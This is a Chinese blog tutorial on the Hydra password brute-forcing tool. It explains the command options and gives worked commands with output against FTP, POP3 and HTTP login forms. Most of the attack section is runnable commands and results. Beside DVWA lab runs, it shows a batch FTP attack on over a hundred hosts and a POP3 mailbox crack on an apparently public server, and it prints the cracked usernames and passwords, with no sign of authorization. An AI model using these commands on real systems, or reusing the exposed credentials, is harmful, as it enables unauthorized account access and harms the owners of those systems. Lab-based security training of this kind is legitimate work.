hydra 及相关示例

最新推荐文章于 2024-11-16 10:21:13 发布
最新推荐文章于 2024-11-16 10:21:13 发布
阅读量167 收藏
点赞数
文章标签: php 运维 ldap

http://www.cnblogs.com/mchina/archive/2013/01/01/2840815.html

 https://www.thc.org/thc-hydra/

语法

# hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]

-R 继续从上一次进度接着破解

-S 大写,采用SSL链接

    -s <PORT>小写,可通过这个参数指定非默认端口

-l <LOGIN>指定破解的用户,对特定用户破解

-L <FILE>指定用户名字典

    -p <PASS>小写,指定密码破解,少用,一般是采用密码字典

-P <FILE>大写,指定密码字典

-e <ns>可选选项,n:空密码试探,s:使用指定用户和密码试探

-C <FILE>使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数

-M <FILE>指定目标列表文件一行一条

-o <FILE>指定结果输出文件

-f在使用-M参数以后,找到第一对登录名或者密码的时候中止破解

-t <TASKS>同时运行的线程数,默认为16

-w <TIME>设置最大超时的时间,单位秒,默认是30s

-v / -V显示详细过程

server目标ip

service
指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等

具体示例, 首先要备好用户名和密码列表

root@kali:~/DailyPentest/BruteForce# more user.list psswd.list 
::::::::::::::
user.list
::::::::::::::
admin
root
hello
wokao
msfadmin
ccadmin
::::::::::::::
psswd.list
::::::::::::::
1
111
22222
11111
123
1234
123456
msfadmin
love
admin123
lovemm

破ftp/telnet/ssh等,方法类似,只要确定对方相应端口是否有打开即可进行破解

root@kali:~/DailyPentest/BruteForce# hydra -L ./user.list  -P psswd.list -e ns -t 20 192.168.0.102 ftp
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-01 22:17:06
[DATA] 20 tasks, 1 server, 78 login tries (l:6/p:13), ~3 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.0.102   login: msfadmin   password: msfadmin

利用-M参数可以批量破解主机。

ubuntu@ubuntu:~/test/tmp/hydra-7.6/bin$ ./hydra -L user.txt -P passwd.txt  -M ip1003.txt ftp
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-02 19:02:58
[WARNING] More tasks defined per server than allowed for maximal connections. Tasks reduced to 1.
[DATA] 1 task, 106 servers, 40 login tries (l:5/p:8), ~4240 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 10.0.3.90   login: root   password: adcadmin
[21][ftp] host: 10.0.3.90   login: p4admin   password: p4admin
[21][ftp] host: 10.0.3.91   login: root   password: swa_123
[21][ftp] host: 10.0.3.109   login: root   password: adcadmin
[21][ftp] host: 10.0.3.103   login: root   password: adcadmin
[21][ftp] host: 10.0.3.176   login: root   password: adcadmin
[21][ftp] host: 10.0.3.179   login: root   password: adcadmin
[21][ftp] host: 10.0.3.112   login: root   password: adcadmin
[21][ftp] host: 10.0.3.91   login: p4admin   password: p42012

破解邮箱。。。

root@kali:~/DailyPentest/BruteForce# hydra -L user.list -P psswd.list  134.147.16.53 pop3
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-03 22:21:55
[DATA] 16 tasks, 1 server, 154 login tries (l:11/p:14), ~9 tries per task
[DATA] attacking service pop3 on port 110
[110][pop3] host: 134.147.16.53   login: katestj   password: 8gafgl
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-03 22:22:46

破http post form,这个稍麻烦一点,需要抓包并按规则写下输入信息

root@kali:~/DailyPentest/BruteForce# hydra -L ~/DailyPentest/BruteForce/user.list -P ~/DailyPentest/BruteForce/psswd.list  192.168.0.102 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=1ba0d80129e941f900a95135cc49ef54"
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-01 22:23:21
[DATA] 16 tasks, 1 server, 66 login tries (l:6/p:11), ~4 tries per task
[DATA] attacking service http-get-form on port 80
[80][www-form] host: 192.168.0.102   login: admin   password: 123
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-01 22:23:25

 get方式提交,破解web登录

 # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
 # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

post方式提交,破解web登录:

该软件的强大之处就在于支持多种协议的破解,同样也支持对于web用户界面的登录破解,get方式提交的表单比较简单,这里通过post方式提交密码破解提供思路。该工具有一个不好的地方就是,如果目标网站登录时候需要验证码就无法破解了。

带参数破解如下:

<form action="index.php" method="POST">
<input type="text" name="name" /><BR><br>
<input type="password" name="pwd" /><br><br>
<input type="submit" name="sub" value="提交">
</form>

假设有以上一个密码登录表单,我们执行命令:

# hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>”

破解的用户名是admin,密码字典是pass.lst,破解结果保存在ok.lst,-t 是同时线程数为1,-f 是当破解了一个密码就停止,ip 是本地,就是目标ip,http-post-form表示破解是采用http 的post 方式提交的表单密码破解。

后面参数是网页中对应的表单字段的name 属性,后面<title>中的内容是表示错误猜解的返回信息提示,可以自定义。

 对dvwa brute form界面的破解

root@kali:~/DailyPentest/BruteForce# hydra -L user.list -P psswd.list  192.168.0.104 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=481b089a941d0aecc848227e2e90202e"
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-03 22:14:44
[DATA] 16 tasks, 1 server, 130 login tries (l:10/p:13), ~8 tries per task
[DATA] attacking service http-get-form on port 80
[80][www-form] host: 192.168.0.104   login: admin   password: 123
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-03 22:14:51

:H其实是用来手动添加Header 域的, 比如上面的我们手动添加了 :H=Cookie: security=low; PHPSESSID=o7qiqd9fc1d003u9d38k64t0f4, 这其实是告诉hydra每次get或者post的时候要添加上这个:H后面的头部的域。没有这个选项无法成功。。

 

weixin_33696106
关注
【安全牛学习笔记】字典、在线密码破解-hydra
edu_aqniu的博客
10-09 5334
字典                                               按个人信息生成其专属的密码字典                     CUPP: Common User Password Profiler                    - git clone https://github.com/Mebus/cupp.git   
oss-hydra-jobs:说明性的hydra项目的示例
02-07
使用 oss-hydra-jobs 示例 `oss-hydra-jobs-develop` 这个文件可能是一个开发分支,包含了一系列配置文件和脚本,用于设置和运行 Hydra 作业。这些作业可以是针对特定软件的构建和测试任务,也可以是整个 Nixpkgs ...
hydra-examples:学习Hydra示例和演示代码
05-06
九头蛇介绍 什么是九头蛇 Hydra是由创建的实时编码库。 Hydra使用JavaScript时,其结构几乎不需要任何JavaScript知识。 如果您来自另一种语言,或者是编程新手,则可以在Hydra中构建非常有趣的视觉效果。 本质上,Hydra接受输入→对其进行修改→返回输出。 安装九头蛇 有三种方法可将Hydra放入计算机。 我建议从在线编辑器开始,然后再下载Atom软件包。 使用网络浏览器: 导航至 。 :sparkles: 你准备好了! :sparkles: 使用Atom: 下载并安装 ,这是GitHub构建的开源文本编辑器。 在Atom内部安装: 开启偏好设定 单击左侧栏上的安装 使用搜索栏搜索“ atom-hydra”,然后单击“安装” 重新启动原子编辑器 使用APM(Atom软件包管理器)进行安装: Atom软件包管理器是一个命令行工具,可用于安装Atom插件 打开终端 运行apm in
hydra实例1
youran02100210的专栏
08-03 901
示例: xp上使用hydra爆破windows server 2003的密码。 1.开启两台虚拟机,xp和win2003。win2003的登录账号是 administrator/123456 2.将在网上下载的hydra包解压并拷贝到xp上。D:\hydra     3.新建password.txt文件,注意文件后缀名是否隐藏。在password.txt文件中准备测试用的密码。     ...
hydra简单使用示例
weixin_34174322的博客
07-08 325
本内容为网上收集整理,仅作为备忘!! hydra简单使用示例: 破解https:    # hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https 破解teamspeak: # hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak 破解cisco: # h...
Hydra dvwa brute force使用小记
热门推荐
无心插柳
08-14 2万+
详细分解Hydra用于测试 DVWA Brute Force模块, 清晰解析了如何使用Hydra来进行http的暴力美学破解
hydra 爆破应用
lendq的Blog
07-05 371
hydra使用教程,xhydrahydra的可视化工具,在kali命令行中输入xhydra即可开启。
Hydra安装使用详解及实战
吃四碗饭的嘤嘤怪的博客
04-09 1万+
Hydra 可以根据使用者指定的用户字名典文件、密码字典文件、目标IP列表来暴力破解目标系统登录用户名和密码。并且其支持多种协议以及并发连接! 安装 GitHub项目地址:https://github.com/vanhauser-thc/thc-hydra wget https://github.com/vanhauser-thc/thc-hydra/archive/master...
Hydra 新手友好使用教程
l1x1n0的博客
10-08 551
Hydra是一款功能强大的网络登录暴力破解工具,支持多种协议,是网络安全测试中的利器。对于初学者而言,Hydra可能显得复杂,但通过简化的教程和实例操作,我们可以快速上手,掌握其核心功能。无论是单一目标还是多目标攻击,Hydra都能高效执行任务。希望这份简介能帮助大家更好地理解和使用Hydra,为网络安全学习之路增添助力。
hydra-threejs:三种js的hydra示例
05-07
三种JS网格纹理的Hydra示例 hydra hack for flok等 复制并运行此命令: fetch ( "https://raw.githubusercontent.com/rexmalebka/hydra-threejs/changes/hack/dist/hydra-three.js" ) . then ( x => x . text ( ) )...
hydra-posframe:hydra-posframe是hydra扩展,可在posframe上显示hydra提示
02-05
Hydra是一种高效的Emacs Lisp库,它为Emacs用户提供了一种简单、快捷的方式来执行一系列相关命令,只需按顺序按键即可,而无需记住复杂的键绑定。它通过减少键盘输入量和提高用户界面的交互性,提升了Emacs的使用...
hydra-login-consent-python:Python中ORY Hydra 1.0.x版的用户登录和同意流程的示例实现
05-04
这是Python中 1.7.x版的用户登录和同意流程的示例实现。 要求:Python> = 3.7 这个例子使用的是官方的 Python库。 在本地运行 使用官方的Hydra Container图像: docker run \ -it \ --rm \ --network= " host...
推荐15个2024最新精选wordpress模板
最新发布
jianzhanyes的博客
11-16 698
英文wordpress模板,适合B2C网站搭建,功能强大且兼容性好,是许多专业外贸网站的首选。绿色的亚马尔Yamal外贸独立站wordpress模板,适用于外贸公司建独立站的wordpress主题。适合工业、制造业企业官网使用的wordpress模板,简洁实用、后台通过主题选项管理,操作便捷。国潮好物,配国产主题,为中国制造加油、助力,适合生产、加工、制造业官网的WordPress主题。制造业wordpress网站模板,适合生产制造企业官方网站使用的wordpress外贸主题。
RabbitMQ 与 PHP Swoole 实现
学习,分享一直在路上
11-12 976
RabbitMQ 是一个开源的消息队列中间件,允许通过异步消息传递来解耦应用程序的各个部分。Swoole 是一个高性能的 PHP 扩展,支持异步编程和协程,适用于构建高并发的网络服务。将 RabbitMQ 与 Swoole 结合使用,可以构建高效、可扩展的应用程序。本文将介绍如何使用 RabbitMQ 和 PHP Swoole 实现一个简单的消息队列示例。使用 Docker 快速启动 RabbitMQ 实例
MDBook 使用指南
qq_39517117的博客
11-12 624
介绍了 MDBook 的基本使用方法,并演示了一个简单的构建过程。
C语言入门到精通(第六版)——第十六章
qq_63485530的博客
11-14 868
3、本地网络上的其他主机接收到ARP请求帧后,检查是否与自己的IP地址匹配,如果不匹配,则丢弃APR请求帧,如果主机B发现与自己的IP地址匹配,则将主机A的物理地址和IP地址添加到自己的ARP缓存中,然后主机B将自己的物理地址和IP地址发送给主机A,当主机A接收到主机B发来的信息后,将用这些信息更新ARP缓存。在发送数据时,应用层的数据传输到传输层,加上TCP的首部,数据就构成了报文。简单来说,套接字就是一个假想的连接装置,其作用类似于插座,插座用于连接电器和电线,套接字用于连接程序和网络,完成通信功能。
IT运维的365天--019 用php做一个简单的文件上传工具
zengsir2012的博客
11-12 1061
前情提要:朋友的工作室,有几个网站分布在不同的服务器上,要经常进行更新,之前是手动复制压缩包到各个服务器去更新(有写了自动更新的Shell脚本)。于是有了这一篇文章。先是在域名的控制台新增一个A记录到统一的一个服务器上,再新增一个CNAME别名upgrade指向到@ (@即代表域名本体),当然也可以直接upgrade做A记录,自己喜好,不做强求。本来得意满满,以为又搞定了一个事情,直至后来要上传大文件,出错了。我重启了nginx,也重启了php,都不生效,还是报错误,无奈,我重启了服务器后,生效了~
【故障解决】麒麟系统右下角网络图标取消显示叹号
鹏大圣运维
11-13 1116
Hello,大家好啊!今天给大家带来一篇关于如何在麒麟系统中解决网络图标出现感叹号问题的文章。在日常使用麒麟系统的过程中,我们在内网或公网环境下,有时会遇到网络图标上出现感叹号的情况。这通常是因为系统默认的 NetworkManager.conf 配置文件中指定了一个用于网络探测的 uri 地址,当系统无法访问这个地址时,就会认为网络不通,从而显示感叹号。即便在公网环境下,有时也会遇到这种问题。今天我们就来介绍几种解决方法,帮助大家轻松排除困扰!欢迎大家分享点赞,点个在看和关注吧!
C03S05-PLinux网络之自动装机
Lin_Nong的博客
11-15 513
PXE( Preboot execution Environment,预启动执行环境 )是一种允许计算机通过网络安装操作系统的技术。PXE也是C/S架构,允许客户端通过网络从服务端下载引导镜像,并加载安装文件或整个操作系统。
创建Hydra非可视插件教程
通过这个简单的非可视插件示例,开发者可以理解如何利用Hydra框架构建更复杂的后台服务。非可视插件的灵活性使得它们能够轻松集成到各种应用程序中,执行各种后台任务,而不会干扰用户的主界面。这种设计模式在现代...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值